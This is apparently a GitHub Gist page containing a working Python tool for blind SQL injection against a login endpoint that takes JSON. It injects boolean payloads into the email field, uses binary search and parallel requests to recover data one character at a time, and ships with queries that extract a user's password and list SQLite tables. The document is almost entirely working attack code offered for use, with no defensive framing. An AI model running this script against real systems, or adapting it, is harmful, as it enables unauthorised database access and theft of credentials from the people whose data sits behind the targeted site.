Last active
January 7, 2021 09:08
-
-
Save RPHAELLA/a3a3e708653f61970a959f18dd77e915 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Blind SQL Injection Enumeration | |
# Copyright (C) 2019 | |
#!/usr/bin/python | |
import sys | |
import re | |
import json | |
import requests | |
import urllib3 | |
from itertools import repeat | |
from multiprocessing import Pool | |
proxies = { | |
"http": "http://127.0.0.1:8080", | |
"https": "http://127.0.0.1:8080" | |
} | |
urllib3.disable_warnings() | |
''' | |
Configure proxy service | |
''' | |
s = requests.Session() | |
s.verify = False | |
s.proxies.update(proxies) | |
''' | |
Send payload with different [CHAR] to server | |
''' | |
def _sending_payload(args, sqli, j): | |
modified_sqli = sqli.replace("[CHAR]", str(j)) | |
if args["sql_type"] == "sqlite": | |
modified_sqli = sqli.replace("[CHAR]", str(hex(j).lstrip('0x'))) | |
payload = args["payload"].replace("[PAYLOAD]", modified_sqli) | |
data_string = args["data_string"].replace("[INJECTION]", payload) | |
if args["method"] == "GET": | |
r = s.get(url=args["target"], headers=args["header"], params=data_string) | |
if args["method"] == "POST": | |
r = s.post(url=args["target"], headers=args["header"], data=data_string) | |
resp = re.search(args["search_term"], r.text) | |
if resp: | |
return j | |
return None | |
''' | |
Implement multiprocessor to speed-up sending of payload | |
TO-DO: Allow no. of processes to be set dynamically | |
''' | |
def _worker_sending(args, sqli, start, end): | |
sqli = sqli.replace("[COMPARATOR]", "=") | |
iterable = zip(repeat(args), repeat(sqli), range(start, end)) | |
with Pool(processes=5) as pool: | |
return pool.starmap(_sending_payload, iterable) | |
''' | |
Search for the most optimal range of ascii [CHAR] to enumerate | |
TO-DO: Allow dynamically set counter | |
''' | |
def _finding_optimal(args, sqli, start, end, counter): | |
mid = start + ((end-start)//2) | |
osqli = sqli.replace("[COMPARATOR]", "<") | |
if counter == 3: | |
return start, end | |
if _sending_payload(args, osqli, mid) != None: | |
return _finding_optimal(args, sqli, start, mid, counter+1) | |
else: | |
return _finding_optimal(args, sqli, mid-1, end, counter+1) | |
''' | |
Get the most optimal range of ascii [CHAR] and proceed to send payload | |
''' | |
def _optimize_attack(args, sqli): | |
start, end = _finding_optimal(args, sqli, 32, 126, 0) | |
return _worker_sending(args, sqli, start, end) | |
''' | |
Set the injection comparators for payload | |
TO-DO: Move injection_string to allow user to define easier | |
''' | |
def _formulate_payload(args, sql_query, eof_range): | |
data = "" | |
for i in range(1, eof_range): | |
injection_string = "(ascii(substring(%s from %d for 1)))[COMPARATOR][CHAR]" % (sql_query, i) | |
if args["sql_type"] == "sqlite": | |
injection_string = "hex(substr((%s),%d,1))[COMPARATOR]'[CHAR]'" % (sql_query, i) | |
# print injection_string | |
output = _optimize_attack(args, injection_string) | |
try: | |
extracted_char = chr(list(filter(None.__ne__, output))[0]) | |
sys.stdout.write(extracted_char) | |
sys.stdout.flush() | |
data += extracted_char | |
except: | |
pass | |
return data | |
''' | |
To read every single records returned from the database | |
- Length is fixed to read 2 chars | |
- Data is dependent on the return value of length | |
''' | |
def _process_payload(index, args, sql_query): | |
sys.stdout.write("\n[Record %s] Length: " % index) | |
length = _formulate_payload(args, sql_query[0], 2+1) | |
sys.stdout.flush() | |
sys.stdout.write("\n[Record %s] Data: " % index) | |
return _formulate_payload(args, sql_query[1], int(length)+1) | |
''' | |
To allow single or multiple data-records enumeration | |
''' | |
def _staging_payload(type, args, sql_query): | |
if type == "s": | |
_process_payload(0, args, sql_query) | |
if type == "r": | |
sys.stdout.write("[*] Total records: ") | |
records = _formulate_payload(args, sql_query[0], 2+1) | |
sys.stdout.flush() | |
tmp_query = [] | |
for i in range (0, int(records)): | |
tmp_query = [] | |
for item in sql_query[1:]: | |
tmp_query.append(item.replace("[OFFSET]", str(i))) | |
_process_payload(i, args, tmp_query) | |
''' | |
Set injection payload | |
''' | |
def _launch(args, context): | |
# Options | |
# [1] limit/**/1,1 | |
# [2] where id=1 | |
injection = [] | |
if context == "password": | |
injection.append("select length(password) from users where id=1") | |
injection.append("select password from users where id=1") | |
return _staging_payload("s", args, injection) | |
if context == "tables": | |
injection.append("SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'") | |
injection.append("SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset [OFFSET]") | |
injection.append("SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset [OFFSET]") | |
return _staging_payload("r", args, injection) | |
def main(): | |
args = {} | |
args["target"] = "" | |
args["method"] = "POST" | |
args["header"] = {"content-type": "application/json"} | |
args["data_string"] = '{"email": "[INJECTION]", "password":"\'"}' | |
args["payload"] = "' OR ([PAYLOAD]) /*" | |
args["search_term"] = "authentication" | |
args["sql_type"] = "sqlite" | |
_launch(args, "tables") | |
print("\n[+] Done!") | |
if __name__ == "__main__": | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment